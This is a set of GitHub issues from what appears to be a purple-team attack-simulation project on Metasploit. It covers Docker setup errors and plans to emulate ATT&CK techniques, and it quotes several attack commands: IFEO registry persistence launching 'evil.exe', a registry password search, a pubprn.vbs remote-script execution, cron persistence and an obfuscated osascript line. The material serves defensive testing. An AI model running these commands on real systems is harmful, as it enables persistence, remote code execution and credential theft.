Cannot go any further install of docker build-
I am sure it is me... but point me in the right direction?
KALI: 18.2 Clean image with fresh update of everything as of today

Error:root@kali:~/purple-team-attack-automation# docker-compose build
ERROR: yaml.parser.ParserError: while parsing a block mapping
in "././docker-compose.override.yml", line 4, column 5
expected , but found ''

My file looks like this:
version: "3"
services:
ms:
build:
context: .
dockerfile: ./Dockerfile
args:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
LHOST: 10.0.4.253
ports:
- 8080:8080
- 443:443
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
volumes:
- .:/usr/src/metasploit-framework

When i completed the file: I rewrite the ENV file
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

NO JOY.

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Metasploit is working fine
=[ metasploit v5.0.66-dev

I installed Metasploit with:

• [ X] Kali package via apt
• [ x] Omnibus installer (nightly)
• [ Community] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• Source install (please specify ruby version)

OS

KALI 18
What OS are you running Metasploit on?

Just curious if it is still usable/

Description

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., "C:\dbg\ntsd.exe -g notepad.exe"). [1]

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [2] IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where is the binary on which the debugger is attached. [1]

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [3] [4] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit. [3] [4]

An example where the evil.exe process is started when notepad.exe exits: [4]

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [5] Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. [6] [7]

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1183/T1183.md

https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/sticky_keys.rb

I don't think the MSF module does the right TTP. See about migrating this to a PowerUp function? May need to do some more research for a better way to execute this.

Can purple-team-attack-automation modules be installed in an existing metasploit or only docker version is supported ?

Description

Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. [1]

Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. [2]

Access tokens can be leveraged by adversaries through three methods: [3]

Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.

Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.

Make and Impersonate Token - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.

Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.

Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. [4] The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. [5]

Plan

Utilize built in MSF functionality

Container is getting closed after some time

Here is my docker-compose.yml

version: '3'
services:
  metasploit:
    image: metasploitframework/metasploit-framework:latest
    container_name: metasploit
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
    links:
      - db
    ports:
      - 4444:4444
    # volumes:
    #   - ./.msf4:/home/msf/.msf4

  db:
    image: postgres:10-alpine
    container_name: postgres
    restart: always
    environment:
      # POSTGRES_DB: msdb
      # POSTGRES_USER: msuser
      # POSTGRES_PASSWORD: msuser
      PGDATA: /var/lib/postgresql/data/pgdata
      POSTGRES_HOST_AUTH_METHOD: trust
    volumes:
      - pg_data:/var/lib/postgresql/data/pgdata
    ports:
      - "5432:5432"
volumes:
  pg_data:
    driver: local

Steps to reproduce

When pulling the repository there are two docker-compose files.

1. docker-compose.yml

version: '3'
services:
  ms:
    image: metasploitframework/metasploit-framework:latest
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
    links:
      - db
    ports:
      - 4444:4444
    volumes:
      - $HOME/.msf4:/home/msf/.msf4

  db:
    image: postgres:10-alpine
    volumes:
      - pg_data:/var/lib/postgresql/data

volumes:
  pg_data:
    driver: local

2. docker-compose.override.yml

version: '3'

services:
  ms:
    build:
      context: .
      dockerfile: ./Dockerfile
      args:
        BUNDLER_ARGS: --jobs=8
    image: metasploit:dev
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
    volumes:
      - .:/usr/src/metasploit-framework

The README info (which seems to be a mix of both):

version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: [Your system's IP address]
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443

Which file should i use to add the LHOST to?
Also the ports component is in the standard docker-compose.yml file. Do i need to add ports there or add ports to the .override.yml file?

Im trying to be a clear as possible, lol, but if its your not understanding, let me know.

thank you!

https://b3n7s.github.io/2018/10/27/AppCert-Dlls.html

1. Create DLL (reference above code)
2. Upload DLL
3. Create registry key
4. Create value/data pair
5. Create a process
6. Confirm persistence is triggered
7. Cleanup

Steps to reproduce

while running docker-compose build get following error:

Step 1/35 : FROM ruby:2.6.2-alpine3.9 AS builder
ERROR: Service 'ms' failed to build: Error parsing reference: "ruby:2.6.2-alpine3.9 AS builder" is not a valid repository/tag: invalid reference format

Expected behavior

What should happen?

Current behavior

What happens instead?
build fails

OS

RHEL 7.4
Using docker EE

this may be the issue?

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information:

Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s

About

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under HKEY_CLASSES_ROOT.[extension], for example HKEY_CLASSES_ROOT.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT[handler]\shell[action]\command. For example:

HKEY_CLASSES_ROOT\txtfile\shell\open\command
HKEY_CLASSES_ROOT\txtfile\shell\print\command
HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.

Instructions

Modify [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt to open with calc.exe instead of notepad.exe, confirm the change was made, and then default to change back (cleanup option)

Also test with the assoc command

Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.md

T1034 currently gets flagged by AV since it uses a MSF post module. Look at modifying the payload or using a PowerUp script

Steps to reproduce

Run the winlogon helper DLL module when the keys don't exist

Expected behavior

Success will be reported but it won't modify the keys as they don't exist

Current behavior

Provide an option to create the keys if they don't exist. If the keys don't exist and it fails to create them, report failure

Description

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). [1]

Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

References

https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1100/shells

https://github.com/BlackArch/webshells

Plan

Either enumerate technology or have engineer specify path/payload

Implement the following steps as a MSF module

Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1159/T1159.md

Steps to reproduce

I installed on Kali linux 2020 2a
Downloaded from https://github.com/praetorian-code/purple-team-attack-automation then
I followed the instructions.
I open msfconsole with ./docker/bin/msfconsole and then search "purple" and the get a few items, i attach the followings errors occurs when execute the commands

root@kali:/home/purple-team-attack-automation# ./docker/bin/msfconsole
Starting purple-team-attack-automation_db_1 ... done
[-] ***Rting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
[-] WARNING! The following modules could not be loaded!
[-] /usr/src/metasploit-framework/modules/post/multi/purple/t1193.rb
[-] Please see /root/.msf4/logs/framework.log for details.

                                                       https://metasploit.com


   =[ metasploit v5.0.69-dev-5e07f93720               ]

• -- --=[ 1957 exploits - 1093 auxiliary - 442 post ]
• -- --=[ 558 payloads - 45 encoders - 10 nops ]
• -- --=[ 7 evasion ]

[] Processing docker/msfconsole.rc for ERB directives.
[] resource (docker/msfconsole.rc)> Ruby Code (261 bytes)
LHOST => 0.0.0.0
[-] Error while running command db_connect: Failed to connect to the Postgres data service: could not translate host name "db" to address: Name does not resolve

Call stack:
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:2048:in db_connect_postgresql' /usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:1832:in cmd_db_connect'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:56:in load_resource' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in load_resource' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in each' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in new' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start' /usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start'
./msfconsole:49:in `

Call stack:
/usr/src/metasploit-framework/lib/msf/core/module/platform.rb:61:in find_platform' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:55:in block in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in each' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in new' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in from_a'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:30:in transform' /usr/src/metasploit-framework/lib/msf/core/module.rb:119:in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/has_actions.rb:6:in initialize' /usr/src/metasploit-framework/lib/msf/core/post_mixin.rb:16:in initialize'
/usr/src/metasploit-framework/modules/post/multi/purple/t1153.rb:9:in initialize' /usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in new'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in create' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:61:in block (3 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in each' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in block (2 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in each' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in block in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in synchronize' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/module_manager/cache.rb:124:in refresh_cache_from_module_files' /usr/src/metasploit-framework/lib/msf/core/module_manager/reloading.rb:51:in reload_modules'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:859:in cmd_reload_all' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:57:in load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in eval' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in block in initialize' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in initialize' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in driver' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' ./msfconsole:49:in

msf5 > search purple

Matching Modules

Name Disclosure Date Rank Check Description

0 auxiliary/admin/smb/smb_connect normal No SMB Connection Utility
1 post/linux/purple/t1016 normal No System Network Configuration Discovery (T1016) Linux - Purple Team
2 post/linux/purple/t1033 normal No System Owner/User Discovery (T1033) Linux - Purple Team
3 post/linux/purple/t1049 normal No System Network Connection Discovery (T1049) Linux - Purple Team
4 post/linux/purple/t1057 normal No Process Discovery (T1057) Linux - Purple Team
5 post/linux/purple/t1069 normal No Permissions Groups Discovery (T1069) Linux - Purple Team
6 post/linux/purple/t1082 normal No System Information Discovery (T1082) Linux - Purple Team
7 post/linux/purple/t1087 normal No Account Discovery (T1087) Linux - Purple Team
8 post/linux/purple/t1107 normal No File Deletion (T1107) Linux - Purple Team
9 post/linux/purple/t1146 normal No Clear Command History (T1146) Linux - Purple Team
10 post/linux/purple/t1201 normal No Password Policy Discovery (T1201) Linux - Purple Team
11 post/multi/purple/t1018 normal No Remote System Discovery (T1018) Linux macOS - Purple Team
12 post/multi/purple/t1046 normal No Network Service Scanning (T1046) All - Purple Team

msf5 >

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.

References
https://attack.mitre.org/techniques/T1174/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1174/T1174.md

Description

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

Implement the following two options as a MSF module

Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1153/T1153.md

Currently the module adds a user.

This should probably do an smb_login with a valid user account to test that authentication logs are working.

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. [1] [2]
Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored. [2] [3] [4]
Inline hooking, which overwrites the first bytes in an API function to redirect code flow. [2] [5] [4]
Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. [6]

Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. [7]

Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1179/T1179.md

DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.

https://attack.mitre.org/techniques/T1207/
Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md
Requires DA privileges

Description

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. [1] [2] [3]

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands [4] [5], directly or through embedded files [6], and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. [7] DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1173/T1173.md

Plan

Create an excel DDE file that spawns calc and upload it. Executing will require engineer actually opening it and accepting prompts

Description

Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.

Office Template Macros
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. [1]

Office Visual Basic for Applications (VBA) macros [2] can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. [3] [4]

Word Normal.dotm location:C:\Users(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm

Excel Personal.xlsb location:C:\Users(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

Office Test
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started [5]

HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf

Add-ins
Office add-ins can be used to add functionality to Office programs. [6]

Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [7][8]

Outlook Rules, Forms, and Home Page
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[9]

Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[10]

Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[11]

Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[12]

To abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.[10][11][12]

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md

Plan

Initially just implement the registry key change

Description

A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. [1] It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. [2] A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. [3] A malicious hypervisor of this nature could be used to persist on systems through interruption.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1062/T1062.md

Plan

Do the powershell commands

And cleanup after

Description

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.

Plan

Do research into http://asintsov.blogspot.com/2017/12/data-exfiltration-in-metasploit.html and identify what infrastructure changes we'll need to make to support this.

https://2017.zeronights.org/wp-content/uploads/materials/ZN17_SintsovAndreyanov_MeterpreterReverseDNS.pdf

While we can do this with something like Cobalt Strike, I'd like to have it as a native capability

Description

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [1] Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses Hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

%WINDIR%\AppPatch\sysmain.sdb
hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb
Custom databases are stored in:

%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom
hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1138/T1138.md

It was identified that the full path to cmd.exe wasn't passed causing the module to not successfully execute

This tactic fails to properly execute if the path to the LNK file has spaces in it.

https://github.com/praetorian-code/purple-team-attack-automation/blob/ddcbc47bee1d2988964687c213a469630d82d407/modules/post/windows/purple/t1023.rb#L87

This line probably needs to be something like "'#{shortcut}'" in order to wrap the LNK path with quotes.

Three methods

Method 1

echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}

Create a sh file that will write t1168m to a file /tmp/t1168m.txt

Method 2

echo "#{command}" > /etc/cron.daily/#{cron_script_name}

Source:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1168/T1168.md

I did not have time to fully dig into this but wanted it tracked to investigate further.

Steps to reproduce

How'd you do it?

Running this module results in the target file being saved to a location within the container that is not accessible from the host file system.

Expected behavior

This file should be saved to a location that is accessible from the local file system either through currently mapped volumes or by mapping a new volume.

Current behavior

Files are saved to /root/.msf4/loot/ within the container but are not accessible in the same or similar location on the local file system.

osascript "do shell script "echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('Zj1vcGVuKCIvdG1wL3QxMTU1bS50eHQiLCJ3KyIpCmYud3JpdGUoInQxMTU1bS50eHQiKQpmLmNsb3NlKCk='));" | python &""

Python code does the following

f=open("/tmp/t1155m.txt","w+")
f.write("t1155m")
f.close()

Defense Evasion, Persistence, Privilege Escalation:

Windows systems use a common method to look for required DLLs to load into a program. Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Adversaries may perform DLL preloading, also called binary planting attacks, by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. Adversaries may use this behavior to cause the program to load a malicious DLL. Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.

Utilize PowerSploit's PowerUp and find dll search order hijacking

https://www.harmj0y.net/blog/powershell/powerup-v1-1-beyond-service-abuse/

We're going to be migrating from our internal repository to our public GitHub release. This issue will track migrating internal issues and planning to the public repo.

Hi,

I can see that the latest ./docker-compose.local.override file is diffrent from the one in github insturctions steps. May i know what to do ? For example , there are no LHOST and ports in latest config files.

Description

Adversaries may target user email to collect sensitive information from a target.

Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.

Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.

Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/Get-Inbox.ps1

https://www.rapid7.com/db/modules/post/windows/gather/enum_files

https://support.office.com/en-ie/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Plan

Also need a way to interact via EWS via passing credentials or current token from session?

launchctl submit -l /path/to/msf/module -- /Applications/Calculator.app/Contents/MacOS/Calculator

Source:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1152/T1152.md

Steps to reproduce

Please guide here:

When i start with: sudo ./docker/bin/msfconsole

Two errors are shown:

1. Error while running command db_connect: Failed to connect to the Postgres data service: could not translate host name "db" to address: Try again

Call stack:
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:2048:in db_connect_postgresql' /usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:1832:in cmd_db_connect'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:56:in load_resource' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in load_resource' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in each' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in new' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start' /usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start'
./msfconsole:49:in `

2. Error while running command reload_all: No classes in Msf::Module::Platform::Linux for ,osx!

Call stack:
